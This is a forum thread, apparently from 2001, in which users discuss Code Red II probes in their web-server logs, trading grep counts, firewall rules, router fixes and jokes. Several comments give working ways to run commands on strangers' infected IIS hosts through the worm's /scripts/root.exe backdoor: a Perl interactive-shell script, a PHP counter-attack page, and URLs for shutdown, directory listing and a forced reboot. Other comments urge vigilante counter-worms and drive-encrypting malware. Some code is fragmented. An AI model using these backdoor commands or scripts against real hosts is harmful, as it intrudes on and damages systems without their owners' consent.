I've received 172 Code Red II attempts today alone (as opposed to 22 Code Red I attempts). Code Red II attempts started at 10:01am (CST) and contine even now. It doesn't appear to be affecting my speed at all (I'm on a DSL line) or even the general speed of the Internet at large, but it's definitely annoying log clutter.
Hmm, make that 173.
Legality aside, why doesn't someone write a worm that will make infected hosts download the patch and run it, then reboot themselves? Or at least power off the infected PCs. Now that would be useful.
Actually you don't need 'cat' or 'wc' here. This works for me, and gets all of my domains/IPs in one swoop:
/home/*/logs/access.today
/home/*/logs/*.gz |grep -c default.ida\?XXX
grep -c default.ida\?XXX
Or for gzipped files:
zcat
- Jman
NGWave - Fast Sound Editor for Windows
Sounds a bit like the way they're going with SELinux. And yeah, a capability-based OS would rock. Sadly, neither contender for market share (be it any version of 'doze or the various UNIXes/Linuxes) has it yet :(
For those of you with the free time and desire to write code to make the world a better place, it'd be a hell of a good project to get involved with.
[root@server httpd]# grep -c default.ida?NNNNNNNNNNN access_log
98
[root@server httpd]# grep -c default.ida?XXXXXXXXXXX access_log
163
the XXXX's are apparently CR2. Looking at the #'s... *joy* =\
It depends on your machine's neighbors. If it's in a subnet with a lot of vulnerabe Microsoft machines, it's going to get hammered. If it's in a well-run subnet, it will only see the odd random probes.
Machines I have in colo centers with small numbers of IPs (backup name servers, etc.) are really getting the treatment. Likewise the servers in a UUnet /26 (so presumably someone else in the Class C is an MS shop - never imagined I'd care). The rest of the stuff, in scattered /24s, is not seeing much of it at all (usually 5 or 6 log entries at this point).
"Patriotism is your conviction that this country is superior to all other countries because you were born in it." -- GBS
Oh, just Windows98... So she can't get infected...
That may be the stupidest Linux advocacy I have ever heard.
I prefer the thing I've heard pool players say. It's a combination shot, so they "combinate".
This next song is very sad. Please clap along. -- Robin Zander
I just invented a new drinking game: the code red log hunt.
You sit at your computer late at night (preferably with a few others around, if you have anyone to share the night with) and enter the addresses filling your logs as they come. If it's the generic IIS "this page isn't here" or "under construction" or other such nonsense, no drink. But if you get a real site, SLAM ONE DOWN!
this is too much fun. I hope I have enough booze for the next few hours.
I was a bit skeptical of the numbers you guys are posting about the attacks, but when I looked at my server's logs for a number of IP addresses I came up with, get this, 9012 individual attacks. Holy crap.
xx.xx.xx.xx - - [04/Aug/2001:17:59:08 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe? ...
SO... someone was trying to exploit the backdoor. Could this be used as another signature to scan for.?
If these viruses/worms/trojans/what have you are designed to make the general public aware of the design faults of the Windows operating system then why don't they write them to do something even more drastic like install Linux or one of the BSDs* over top of the existing OS?
The ideal code red worm in my opinion would take the contents of a website, send it off to another infected host, go about it's business installing an alternative OS and then bring back the data and have the system up and running again with the alternative OS. This would bring up all the uproar about the problems which is what the writer wants, while seemingly solving a problem at the same time. Plus it gives all those administrators that are stuck working with Windows but want to switch to something else thier chance!
* yes I know that Linux and *BSD have thier fare share of security problems too, I am mearly using them as an example.
That's really nice!
Here are my logs: here.
Only 34 so far, but I only decided to open up apache to these this afternoon...
Cheers for that!
Not to nitpick, but this isn't "Code Red 2". The first strain of the Code Red worm had a broken random IP address generator, so it failed to propagate effectively. The one that stirred up so much fuss last month (and again last Wednesday) was CRv2, the same worm with the random address stuff repaired. I don't think that "Code Red 3" would be an appropriate descriptor, either, as there are undoubtedly many other variations going around. I've been calling it "Code Red X", for obvious reasons.
... /scripts/root.exe HTTP/1.0
Secondly, you can reboot a Windows machine from the DOS prompt. Here's how:
lebowski:pts/1% telnet infected.host.net 80
Trying 24.1.1.1
Connected to infected.host.net.
Escape character is '^]'.
GET
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sun, 05 Aug 1984 05:18:57 GMT
Content-Type: application/octet-stream
Microsoft Windows 2000 [Version 5.00.2183]
(C) Copyright 1985-1999 Microsoft Corp.
c:\inetpub\scripts> echo g=ffff:0|debug
Disclaimer: I haven't looked closely enough at this worm to know what rebooting an infected host will do. With CRv2, a simple reboot would make it stop propagating itself. If CR-X behaves the same way, we could probably put a damper on this scourge with a simple Perl script that connects to infected hosts and sends the reboot command.
Gratuitous Anti-MS Comment: We all know what the real problem is here.
I found out an easy way to slow down Code Red's scanning progress off a certain security site. Respond to the initial SYN packet with a SYN/ACK, but then don't acknowledge any further packets. The other side will spend several minutes retrying to send the worm to you, before finally giving up. I did this by adding this simple ipchains rule to my firewall (no, I haven't figured out iptables yet): ipchains -I input -j DENY -p tcp -s 0.0.0.0/0 1024:65535 -d $MY_IP 80 ! -y Of course, if you actually run a webserver, which I don't, that would be a bad thing to do. Also, it is possible to get a command prompt on most infected servers, by telnetting to port 80 of the machine and doing an HTTP request for /scripts/root.exe. Surely it must be possible to either warn the administrator, clean the machine, or at least knock the machine off the network from there? I'd investigate it more myself, but I've heard enough horror stories about people investigating hacked systems whose houses get raided by the FBI or something similar that I think I'll stick to more passive resistance. :)
That's for sure.
I think a way to bang it into everyone's head is to write some worm that will encrypt the Windows user's hard drive for a random amount of time (say 14-21 days.) And whenever they try to boot, they get some sort of message warning them about the dangers of clicking on all things, running unpatched software, running M$ software in general.
They'd remember that. And it would get a lot of press.
Already done it (well, not crashing, but I email hostmaster@their.domain), just do:
.ida
AddHandler cgi-script
In your httpd.conf and make a little perl script or something called default.ida to log it. It's been great fun, shoulda been to bed hours ago, but I'm playing around with my script instead. =)
WWJD? JWRTFM!!!
Nope. They probed you first, so it's just "fair retaliation". And "fair retaliation" is an integral part of the anti-piracy laws, which Supreme Court insisted to add in order to keep the law in line with the Second Amendment of the Constitution ;-)
This is a virus that installs a root kit. The question is, why? Clearly this is in preparation for a next phase. Sysadmins need to be thinking ahead on this.
Indeed this does work. What I find interesting is that the majority of the IPs I've checked from my router logs have the stock, "Under Construction" IIS page from a new install and that the NT/2000 and Inetpub dirs have very recent creation dates associated with them. What I gather from this is that possibly these boxes were deliberately created for Code Red's sake by the curious. Maybe they just want to see what would happen. However, the fact that the IPs are scanning me suggests that they are not blocking the worm's ability to scan others, all the while allowing it to propogate. That in itself is bad news in my eyes.
311 here, linux server also running apache =)
Having said that, you could kill off a Windows PC by issueing
GET /scripts/root.exe?/c+SHUTDOWN
Other commands are possible as well: GET /scripts/root.exe?/c+dir+/s+\ gives you the recursive directory tree. Formatting, starting Fdisk and the like are possible, too.
If someone could post a shutdown.exe somewhere, I'll be glad to provide a simple script that downloads the executable and starts it, thus stopping the IIS machine. Or maybe this is our chance to create Tuxissa :)
my other sig is a 500 page novel
This will not work. How is your worm going to spread if you fix the system?
The above is not worth reading.
OK, here is the story:
<OS Vendor> released <OS Version> and had <software> enabled by default. A bug was found in <software>, so <OS Vendor> released a patch. Most admins didn't install the patch for some reason or another. A while later, someone wrote a worm that exploited the bug. This worm spread like wildfire and infected a lot of servers.
Filling in the blanks:
<OS Vendor>=RedHat
<OS Version>RedHat 7.0
<software>=Bind
The only reason this is more devestating to the net than the Bind exploit was is because MS has a higher installed base. If RedHat had the same installed base, the effects would have probably been much worse.
So where is your call to have RedHat tarred and feathered?
Unlike a car that explodes to a design flaw, software that explodes due to a design flaw seems to be immune to the civil justice system.
You left out some key facts:
- Operating systems are more complex than cars.
- Operating systems don't require a license to be operated.
"And like that
Wanna have your own complete copy?
nc -v -L -p 80 -o hex.dump > text.dump
Works with the unix and win32 version of netcat, I have had a window open watching trafic coming in on port 80 for a couple of days now, its really weird to know port 80 and 111 are aparantly that interesting on a normal dailup providers ip range.
thx!!!!!!!!!
There's got to be a legal basis for it somewhere.
Thanks to you, you just infected my IIS 5.0 server. I will now sue your pants off.
http://support.visi.com/dsl/242/
I'd suspect that you could also find it this update using google (look for "c675.2.4.2.bin" or something equivalent ...)
Anyone have a link for the 2.4.2 firmware? I found 2.4.1, but no 2.4.2. I'm a Qwest DSL customer, so Cisco TAC tells me to talk to them, but they won't talk to me because qwest.net isn't my ISP. My local ISP is very good, but aren't big enough to get decent service for Cisco and get things like this. So I'm stuck, and will soon be out of town for 10 days and don't want my DSL router to lock up and cause me to lose email...
anyone have commands to do this for linux 2.2 kernels?
The CERT alert is explicit that the worm only infects NT/2000 machines running IIS. Why is the Windows 98 Personal Web Server (a limited version of IIS 4) not vulnerable?
John Faughnan
jfaughnan@spamcop.net
And it doesn't have the deltree command. Del functions the same as deltree, except with a y/n prompt.
I noticed this afternoon, I could not make any calls on my cell phone. I called customer support serveral times. They were busy. I guessed they were having problems with their network. My friend, who is on a defferent network (I am on Rogers AT&T Canada, he is on Fido Canada), also could not make any calls. Could it be that this worm brought down some cell phone networks?
This is very interesting. I've recently been studying spatial population models of dispersal, e.g. when trees release seeds, should they go a short distance or a long distance? I.e. which will make them more likely to survive, and what combination of strategies will be evolutionarily stable?
Short-distance dispersal is best on aggregated landscapes, where good habitat is likely to be nearby, although such strategies end up competing with themselves quite intensely. Long-distance dispersal is good on unclustered landscapes, where you're better off hoping to colonize a good site far away. But it turns out that mixed seem to really kick butt; they exploit local rich patches of resources, but an occasional long-distance propagule allows them to colonize far-off patches once in a great while, and also reduces intraspecific competition somewhat.
It would be really interesting seeing a few different Code Red's going with different proportions of near versus far dispersal, to see which one does best. It would tell us something about the aggregation of exploitable machines on the net. Although I suppose some people may object to such a study.
As an AC pointed out in another reply, the really clever thing to do would be to have an adaptive strategy with a bit of randomness in it (i.e. the parameters in the strategy are changing too). That way, it would eventually "find" the strategy that works best, and in fact different subpopulations could converge to different locally optimum strategies.
Telnet into your router. If this is disabled, plug in the management interface, use hyperterminal/terminal software/direct serial port access/however you do this. log in. enable.
set web port 81
set web disabled
write
reboot
....
exit
This is the only effective way I know of. As far as I know all CBOS are vulnerable. Don't expect to get pre-CR2 performance, though, as you are still receiving a decent chunk of extraneous traffic, and qwest's (or whomever your provider is) lines are fairly bogged, as is everyone elses.
-aaron
I find it odd that my OS X (Apache httpd) webserver is now inaccessible to the outside world because @Home has filtered port 80 my IP. Even my other IP is filtered on port 80, and it doesn't even have any services running. This sucks because other @Home customers who HAVE been bitten by the worm haven't had incoming requests on port 80 blocked. If @Home is going to start enforcing the TOS on users that aren't hosting warez servers or any high-bandwidth servers, then I'm going to cancel my subscription. My 128 kbps upstream cap is horrible enough.
Qworst does have the Cisco CBOS 2.4.1 firmware update available for the Cisco 675 which should fix the lockups caused by code red. But they've made it hard to find. It's at: http://www.qwest.com/dsl/customerservice/win675ups .html
Although they say windows only, the upgrade can be done with any terminal which supports xmodem transfers via the serial management cable. You don't need the wintel Cisco Commander software.
The upgrade via the qwest.net faq link to the qwest.net ppp mode conversion page only upgrades to 2.2.0, which doesn't help. Qwest.net does not know about the qwest.com page.
Qwest.net seems to be totally separate from qwest.com. Qwest.net are clueless idiots who support absolutely nothing except basic connectivity; qwest.com has the dsl people who can help with Cisco problems. Choose the "tier 1 LAN support" option when calling in to 888.777.9569.
This option seems to be available only if you choose the "business" dsl option instead of "home". I assume that means qwest megabit "deluxe" or "pro" accounts.
An added bonus is that qwest.com does not have the sucky midi hold music that repeats every 30 seconds.
Having said all this, I notice that 3 systems that I admin do not respond to ping tonight. I'll check them Sunday, but the upgrade does not seem to have solved the problem.
Hi, I'm a stupid IIS admin. Will somebody please tell me what this 'r00t' is?
Thanks!
Joe Blow
MCSE
For an interactive shell,
/scripts/root.exe?/c+$command HTTP/1.0\n\n";
#!perl -w
use IO::Socket::INET;
use URI::Escape;
my $remote = "@ARGV";
die "usage: $0 host\n" unless length $remote;
while()
{
print "> ";
my $command = <STDIN>;
chomp $command;
$command = uri_escape($command);
my $s = IO::Socket::INET->new(PeerAddr=>$remote, PeerPort=>80);
die "Can't connect to $remote\n" unless $s;
print $s "GET
print while <$s>;
}
Oh, I didn't know that. I'm curious, does it send the windows' contents as a bitmap or does it actually send the GUI system calls over the line?
Monkey sense
well, you are wrong. plz search archives for "BIND", Sendmail (more problems than morris worm), WU-FTPD...etc..etc...etc...
it should work. BackOrifice2k had the same kind of ability. I was able to cmd winipcfg and notepad \autoexec.bat, and others to popup.
This is actually a Microsoft ploy... they are using it to gauge their share of the webserver market! I can see the headlines now... "Microsoft IIS the innovative leader in home web servers."
http://bike.stu.ph/rides - free GPS routes available for Garmin, Magellan, GPX and Google Earth
Someone should copyright the "code red algorithm". No. Wait. That would make it more popular.
Changing the name to "Code Bob" or "Clippy" might slow things down a bit.one better than mcleodeight
can anyone confirm that this works? I want to take over control of default.ida for my virtual hosts to help kill this. sample script?
Nah, it's a country wide civic holiday, so it'll have different names in different areas.
Vintage computer games and RPG books available. Email me if you're interested.
actually, you can do remote gui logins through terminal services. All it does is run your commands as a seperate thread and then pipe the output back to your client to be processed by your machine. It has some security holes in it though, another quality product from microsoft.
I'm using Win98 with @home, and Zone Alarm as the firewall. I usually get maybe 10-20 hits a day, but just like everyone else, when I saw this article I pulled up the log and I was banged over 400 times within the course of 4 hours, the vast majority coming from 65.2.x.x. I wouldn't be concerned, but what if there's a crIII worm that does affect Win 98 machines? Luckily I have Linux on a second partition, and I even got @home working with it. (Just in the course of typing this message I got hit another 5 times, and the receive light is flickering like a worn out neon light.)
2001-08-04 14:35:16 24.180.74.2 was first for me.
Vibrating Heat Beads and Crystal Meth. Jimmy, I'm the DEVIL!
I'm running NetPresenz on an old PPC 7200/75 I have just as a staging area for several projects of mine. I've noticed a signifigant increase in visits over the last few days. I'm just wondering how I would know if I'm being hit by the virus. I know my server can't be infected for a number of reasons, but I'm just curious to know if I'm being "attacked".
Pooty tweet
Hear, hear brother...I can't stand the whining "but there's no webmaster@...every IP address on the internet has to have a webmaster account" crap.
Shutting down free speech with violence isn't fighting fascism. It IS fascism!
I've read a lot of the messages here, and I think people/we should set precedent now that any system left open to a published exploit MAY BE ENTERED through that interface and the broken service stopped/disabled or the server shut down--at least in response to an active probe.
These distributed attacks are everyone's problem. I agree with the "house on fire" analogy someone else posted. It's time to stop gawking and start grabbing buckets.
Could someone post a windows script that will send a message locally to webmaster and then turn IIS off, and block it coming back up, at least until restart? (sorry, been way too long since I used windows) Maybe such counter-actions can be published along with exploits, and improve over time.
Think "copy-cat" incidents like Columbine.
I Browse at +4 Flamebait
Open Source Sysadmin
How many out-of-work sysadmins do you know?
It seems that thousands of US corporations have been persuaded that paying a knowledgeable person to run the server farm is a luxury. Haven't you seen the recent Microsoft TV ads? The computers just admin themselves now! Woo hoo!
yeah, that won't take any bandwidth to do...
look elsewhere in the discussion, people have figured it out
"Depression is merely anger without enthusiasm." - Anonymous
Who needs telnet?
\
Just type the following into a browser using one of the infected systems from your log file:
http://infected_system/scripts/root.exe?/c+dir+c:
You are greeted with a directory listing of the root of C:\!
I just scared the crap out myself by trying this, and it worked.
At least one compromised machine launched root.exe the first time it was touched this way, but then started responding with the error page.
Is this collateral damage as the ravening script-kiddies of the internet discover a new and vulnerable target? Or is it an attribute of the compromise itself?
about 170 attacks so far. (about 5/hour) I downloaded the patch back in late July. Point, click, click, reboot. That simple. Had I not downloaded the patch for my NT machine, my BlackIce Defender Firewall would've bounced the attacks anyway.... which it did. Lesson: When MS fails, get a firewall!
Nice analogy. Here in Seattle, every other year or so, the Snohomish river washes people's houses away, developers come along, build shoddy houses (because they only need to last for a few years), people from other parts of the country move into them, flood, repeat.
Microsoft builds shoddy software because by the time exploits are found, they can say "you really ought to upgrade to the latest and greatest, besides, it has all these new features". The software isn't any better, just less well known. If they were to stop for a second, build a stable, secure, extensible framework, they would be able to add all the "features" people are "asking for" without introducing more security flaws. However, that would be like building dikes to contain the flooding river. They would just rather move elsewhere.
havent been paying attention have you???
PoizonBOx is a very famous (at least among them)group of defacers from Brasil.
I sent a log to Rogers telling them to notify the people to patch their computers. It would seem that both version of the Code Red virus is spreading. grep 'default.ida?NNNNN' access_log | mail -s 'APACHE' abuse@rogers.home.net
A couple of possibilities:
- the infected servers are just DoSed by the number of people scanning them back on a small connection
- IIS is actually running on WinNT/2K Workstation, which has a limit of something like 10 concurrent inbound TCP connections (exacerbated by HTTP/1.1, used by most browsers these days).
I'm gonna check the "well-known numbers" RFC, but
I did a little scan of one of the infectoids:
Ports open at:
21
25 (open mail relay too!)
80
135
139
443
445
1025
1027
2057
2162
2174
2200
2210
2214
2219
2227
2228
2257
2282
I recogize some of those ports, but surely
windows doesn't need all those ports open?
If somebody had deep linked versions of these via ftp, we could write a white hat worm easily.
t ch/q300972/NT4/EN-US/Q300972i.exe
0 00platform/Patch/q300972/NT5/EN-US/Q300972_W2K_SP3 _x86_en.EXE
Anybody have ftp deep link equivalents of:
http://download.microsoft.com/download/winntsp/Pa
Writing a worm to wget those would be a bitch, but ftp comes installed on all NT boxen... so its easy
and
href="http://download.microsoft.com/download/win2
Several machines listed in logs as attacking
show up on eeye.com's CodeRedScanner as not
being vulnerable to the index.ida exploit.
Is it possible that the CRII worm seals the hole?
Or maybe those servers have been patched alread.
If you are replying to a clerk that doesn't give a rat's ass about complaints then nothing will happen. If you write to the CEO of the insurance company then something might happen.
my bank used to run IIS for its online banking environment.
several months back, they switched to IBM's Apache variant. long before Code Red. and reimplemented their ASP code as java servlets.
well, it makes me feel better anyway :)
my old sig used to be funny, but then slashcode ate it and now it's not funny anymore
Download the patch. Put it on a floppy. Walk it over to the new system. Apply it.
Or just burn Service Pack 2 to a CD-R.... or put it on a network behind the firewall. Not that big of a deal.
I see XXX in my logs all the time, but then again that might have something to do with what I host ;-)
Not much unusual traffic here. i am relying on a firewall as i am running IIS unpatched on Win2k. and i won't be hit.. don't worry. :)
-A
i hope they do go down, all the fucking wannabe spammers, the email harvesters, and about 80% of the crack attacks come from @home addresses.
This worm, like the original Code Red worm, will only exploit Windows 2000 web servers because it overwrites EIP with a jmp that is only correct under Windows 2000. Under NT4.0 etc... that offset is different so, the process will simply crash instead of allowing the worm to infect the system and spread.
But I'm sure someone will create various flavors with teh right jump points to hit all the IIS variants. Only a matter of time.
Top Most Bizarre/Disturbing Error Messages
So does this do anything differently?
"Not my manner of thinking but the manner of thinking of others has been the source of my unhappiness." - M
Hey, what's wrong with 128Kbit unless you're streaming porn or something? My webserver runs just fine on my ISDN link.. can't get cable or DSL. :-(
Taken from http://www.securitynewsportal.com/article.php?sid= 1354&mode=thread&order=0
= 1354&mode=thread&order=0 .
Code Red--the soda--has been spreading almost as fast as its namesake computer worm, which has infected hundreds of thousands of computers to date. The caffeine-laden, cherry-flavored version of its pale-yellow cousin, Mountain Dew, was released in May, months before the Code Red worm threatened to clog Internet traffic. And as computer security experts work to contain the damage from the Code Red worm, the soda's maker, Pepsi, is coincidentally featuring a "Crack the Code" contest on the Mountain Dew Web site.
Code Red has been an especially big hit with computer programmers, who often guzzle the high-octane drink to fuel late-night code-writing sessions. Among the drink's fans were the staff of eEye Digital Security, who say they identified the Code Red worm and named it after their favorite soda..
The rest of the story can be found on http://www.securitynewsportal.com/article.php?sid
Its funny. Laugh. Please?
Even if you don't like your mother-in-law, that's no reason to let her use Windows. Think about your wife, and HER feelings. Buy your mother-in-law a Mac today. Keep the domestic peace.
Ok folks. Promise to be good with the following.
r t+ http://www.digitalisland.com/codered/
/scripts/root.exe?+/c+start+http://www.digitalisla nd.com/codered/
If you use the following it should pop up a web browser on the screen of the infected computer (of course replace xxx.xxx... with the infected IP):
http://xxx.xxx.xxx.xxx/scripts/root.exe?+/c+sta
alternativley you can telnet into port 80 and type:
GET
Now create them perl scripts and fix the world.
Dozings.com -- Its kinda funny... If you're as crazy as me.
I just set up a page-generator to give some statistics for my logs. Here it is.
;)
I thought I might use it at work tomorrow, but you guys can take a look at it.
My perl script is also up there, if you guys want it. It looks at the logs, and separates out Code Red 1 and Code Red 2 hits into different files. It also gathers a tiny bit of statistics, like # of code red 1 hits, # of code red 2 hits, and # of hits total.
The cool thing about my perl script is that it generates a new "index.html" for you every 30 seconds with updated statistics on it. (not like that was hard to do though.
my roadrunner service has been slow and unstable for over a week now. But I only started receiving code red hits on aug 1st according to my logs. It's weird though... I would expect slowdown across the board - that is, affecting all services and slowing down data throughput, but it looks like my primary problem is an extremely slow dns resolution. Oddly enough, I still get full speed transfers after that. I think I'm going to do some reading and just start serving my own dns
I hereby propose we adopt your post as a convention.
We can thus encode "war stories" about the latest [worm/virus/trojan] as follows, saving Slashdot a fortune in bandwidth charges.
For instance, I can now describe my evening as follows:
"IIS. Code Red II. flaw. IIS. doesn't. FreeBSD. 429. worms. thousands. Apache. Apache. FreeBSD. company. worm. 6.2MB."
And why dosent any one sue M$ over all these security flaws ? I know that if a company made an unsafe tire tbey get sued.. why not M$ for such awful code ?
Because if M$ is like most other software companies, their license agreement says [in legalese], "Here's our software. No matter what our marketing materials say, we don't guarantee it against anything. If a bug or bugs in it causes someone to die, or you or your company to lose a million bucks, you're SOL and we're not liable-- because like we said, there's no guarantee, and frankly, you should have known better than to trust us."
The difference between Microsoft and Firestone is when the weasling-out-of-accountability occurs: Firestone's army of lawyers did it after feces met fan blades by pointing fingers at Ford, Microsoft's did it in advance with the EULA, putting the onus on the hapless sysadmin who had to install that Windows claptrap when the suits ordered him to "make the company compatible with the rest of the world!"
~Philly
"So after the last 20 root exploits of Linux and Apache, we shouldn't use that either?"
Of course you shouldn't, especially if they happened within a short period of time. Why would you use any insecure system? If linux and apache got rooted as much as IIS you can bet your ass I'd drop it like a hot potato and move on to something else. There must be a thousand web servers out there both open source and commercial anybody who willingly uses an insecure one is just plain stupid at best and criminally negligent at worst.
War is necrophilia.
On the basis of that, this should work. I'll watch the logs with interest.
/scripts/root.exe?/c+ren+root.exe+infected.dat HTTP/1.0\r\n\r\n");
.$res );
<?php
header("HTTP/1.0 400 You cheeky fucker");
?>
<html>
<title>Red Alert</title>
<?php
$fp =fsockopen($REMOTE_ADDR,80,$en,$es,5);
if (!$fp)
{
echo "I tried to disinfect you, but couldn't connect: $es ($en)";
}
else
{
fputs ($fp, "GET
echo "I tried to disinfect you, and the server started to say:<h2>";
echo $res =fgets($fp,1024);
fclose($fp);
}
$log=fopen("/tmp/redalert.log","a");
fwrite($log,$REMOTE_ADDR . " " . date("r") . " "
fclose($log);
echo "</h2> $SERVER_SIGNATURE";
?>
Actually, this would be version III, rember the one with the fixed random generator, thats version II.
I think the author of version three didn`t know this and called his baby, CodeRedII ( I have seen it in a hexdump ) and this new version looks so much difrend, I guess its a copycat made to look like codered and leave a backdoor. Its simply one of many attempts to use the codered hysteria to get away with messing with other peoples webservers.
100*100 = 10,000
100*100*100 = 1,000,000 (250,000 is probably the total number of hosts that will be infected, so you'll start getting diminishing returns as you get duplicates)
pick up a cable or dsl address then wait until sometime when you KNOW a user is around:
copy con sillymessage.txt
wake up, neo
notepad sillymessage.txt
copy con sillymessage.txt
follow the white rabbit
Why do you call this pattern bizarre? That's how I'd scan if I wrote a worm: if you manage to infect a computer at a particular IP adress, then you have some evidence that computers 'close' to that one will probably be vulnerable as well, so you attempt to infect 'close' computers more than 'distant' ones.
You keep trying the 'distant' ones every now and then, just in case you get lucky.
-- Help Digitise the Public Domain at DP.
"It's not a war on drugs, it's a war on personal freedom. Keep that in mind at all times." Bill Hicks
The biggest problem I see is that any idiot can set up an IIS server.
I went to a training class once on IIS - we put in the CD, clicked "OK" a lot, and we had a web server! W00t! With an Apache installation on *nix, you have to know more. This keeps the intelligence level higher on the world's collective Apache admins. (And before you bring it up - yes, I am worried that Linux might go the same way.)
I've checked my logs and found the majority of attempts coming from sprintbbd.net. Now, it is VERY unlikely that real businesses with real, paid administrators get their connection from Sprint Broadband. (For one thing, the upload is capped at around 30k/sec.) I'll bet the majority of them are home user admin wanna-be's who run a pirated version of IIS. The chances are they don't know or don't care that they've been infected. (Or maybe they forgot that they installed a web server?)
That's frightening. That leads me to believe that this worm will never go away. As long as there are enough monkeys, it'll stick around.
I got my Linux laptop at System76.
While this is a remote exploit, it's not nearly as severe as the default.ida one on IIS. The apache exploit can be used to gather directory listings etc. and does NOT allow arbitrary code to run.
Must be a lot of people running win2k without turning off (or patching) IIS.. I read this story and noticed that ZoneAlarm recorded about 450 attempts in the last 10 hours.
I noticed that PenguinPPC has a Code Red Wall of Shame that details their hits. Interesting :)
My other car is first.
"Now that they have the backdoors, though, how hard would it be to patch them remotely?"
Why bother? can't you think of more interesting things to do with their computer?
War is necrophilia.
I'm sick of this shit. If I weren't a Libertarian, I'd be for licencing admins before they can play on the Internet. Even without MS code on my servers, I still pay for thier shoddy work.
A firewall can not protect you from yourself. Turn off what you do not need. Do not use the firewall to do your work.
15:17:55.926357 66 66.31.103.8:1182
15:17:56.455575 66 66.31.103.8:1182
15:17:56.914265 66 66.31.103.8:1182
15:18:51.345615 66 66.31.154.13:3775
15:18:51.809777 66 66.31.154.13:3775
15:18:52.315579 66 66.31.154.13:3775
15:20:31.726119 66 h005004e76369.ne.mediaone.net:1464
15:26:57.052001 82 h00d0b7aae700.ne.mediaone.net:3273
15:26:57.554770 82 h00d0b7aae700.ne.mediaone.net:3273
15:26:58.080174 82 h00d0b7aae700.ne.mediaone.net:3273
15:32:13.332288 66 66.31.19.147:2582
15:32:16.792146 66 66.31.19.147:2582
15:38:43.880391 66 66.31.142.16:2833
15:38:44.349189 66 66.31.142.16:2833
15:38:44.837484 66 66.31.142.16:2833
15:38:52.958961 66 66.31.19.147:4967
15:38:56.331219 66 66.31.19.147:4967
15:39:22.530713 66 h005004e76369.ne.mediaone.net:3502
15:45:36.976398 66 66.31.219.14:3197
15:45:37.413835 66 66.31.219.14:3197
15:45:37.916280 66 66.31.219.14:3197
15:54:11.568987 66 66.31.19.147:4031
15:54:12.944575 66 66.31.19.147:4031
15:54:13.671940 66 66.31.19.147:4031
16:02:34.867118 66 66.31.132.21:2833
16:02:35.371367 66 66.31.132.21:2833
16:02:35.882127 66 66.31.132.21:2833
16:02:46.817720 66 h000102677395.ne.mediaone.net:1786
16:02:47.287915 66 h000102677395.ne.mediaone.net:1786
16:02:47.788921 66 h000102677395.ne.mediaone.net:1786
16:06:00.221683 66 66.31.176.78:4774
16:06:00.665340 66 66.31.176.78:4774
16:06:01.198356 66 66.31.176.78:4774
16:06:51.106485 66 66.31.63.221:1773
16:06:51.544882 66 66.31.63.221:1773
16:06:52.045970 66 66.31.63.221:1773
16:07:21.831421 66 h005004e76369.ne.mediaone.net:2806
16:13:37.998428 66 66.31.103.8:4157
16:13:38.630149 66 66.31.103.8:4157
16:13:39.212269 66 66.31.103.8:4157
16:13:52.402633 66 66.92.42.226:4663
16:13:53.045855 66 66.92.42.226:4663
16:13:53.839430 66 66.92.42.226:4663
16:18:50.300523 66 66.31.246.7:2321
16:18:53.282808 66 66.31.246.7:2321
16:18:59.316794 66 66.31.246.7:2321
16:21:09.464645 66 h0000b49dc596.ne.mediaone.net:3107
16:21:09.944963 66 h0000b49dc596.ne.mediaone.net:3107
16:21:10.443831 66 h0000b49dc596.ne.mediaone.net:3107
16:23:27.411286 66 66.31.185.167:2183
16:23:27.938047 66 66.31.185.167:2183
16:23:28.452444 66 66.31.185.167:2183
16:28:18.662032 66 66.31.34.197:1696
16:28:19.129875 66 66.31.34.197:1696
16:28:19.626824 66 66.31.34.197:1696
16:32:51.201752 66 66.31.19.147:2492
16:32:51.777039 66 66.31.19.147:2492
16:32:52.378695 66 66.31.19.147:2492
16:33:10.648478 66 h005004e76369.ne.mediaone.net:2842
16:34:06.006982 66 66.44.68.170:1422
16:34:08.745472 66 66.44.68.170:1422
16:34:12.646083 66 66.44.68.170:1422
16:34:56.562721 66 h005004e76369.ne.mediaone.net:1532
16:43:19.793887 66 66.31.246.7:2864
16:43:22.781620 66 66.31.246.7:2864
16:43:28.777960 66 66.31.246.7:2864
16:46:01.392954 66 h005004e76369.ne.mediaone.net:1295
16:46:21.879237 66 66.31.52.223:3247
16:46:22.392232 66 66.31.52.223:3247
16:46:22.887446 66 66.31.52.223:3247
16:47:05.175983 66 66.31.63.221:1297
16:47:05.636452 66 66.31.63.221:1297
16:47:06.145739 66 66.31.63.221:1297
16:49:09.419653 66 h005004e76369.ne.mediaone.net:4128
16:58:42.992110 66 h005004e76369.ne.mediaone.net:3037
17:01:18.504047 66 h005004e76369.ne.mediaone.net:3066
17:02:03.666041 66 66.31.219.14:1882
17:02:04.151032 66 66.31.219.14:1882
17:02:04.645839 66 66.31.219.14:1882
17:04:46.063851 70 66.31.104.220:3718
17:04:46.500532 70 66.31.104.220:3718
17:04:47.007617 70 66.31.104.220:3718
17:06:06.313739 82 h00d0b7aae700.ne.mediaone.net:4826
17:06:06.776410 82 h00d0b7aae700.ne.mediaone.net:4826
17:06:07.277350 82 h00d0b7aae700.ne.mediaone.net:4826
17:06:12.024931 66 66.31.185.167:1836
17:06:12.531221 66 66.31.185.167:1836
17:06:13.026034 66 66.31.185.167:1836
17:06:36.310510 66 h005004e76369.ne.mediaone.net:4019
17:07:23.861454 66 h005004e76369.ne.mediaone.net:4160
17:08:42.640964 82 h00a0cc3b6d03.ne.mediaone.net:1390
17:08:43.136835 82 h00a0cc3b6d03.ne.mediaone.net:1390
17:08:43.648328 82 h00a0cc3b6d03.ne.mediaone.net:1390
17:18:12.932029 66 h00a0cc65dafd.ne.mediaone.net:2123
17:18:13.353661 66 h00a0cc65dafd.ne.mediaone.net:2123
17:18:13.861988 66 h00a0cc65dafd.ne.mediaone.net:2123
17:25:33.297043 66 h000102677395.ne.mediaone.net:2526
17:25:33.847671 66 h000102677395.ne.mediaone.net:2526
17:25:34.309018 66 h000102677395.ne.mediaone.net:2526
17:26:58.779025 66 h005004e76369.ne.mediaone.net:4632
17:29:48.823342 66 61.33.72.216:3658
17:29:49.539975 66 61.33.72.216:3658
17:29:50.224710 66 61.33.72.216:3658
17:48:19.979383 66 208.253.160.5:4707
17:48:20.654818 66 208.253.160.5:4707
17:48:21.414775 66 208.253.160.5:4707
17:48:45.888894 82 h00d0b7aae700.ne.mediaone.net:3340
17:48:46.358168 82 h00d0b7aae700.ne.mediaone.net:3340
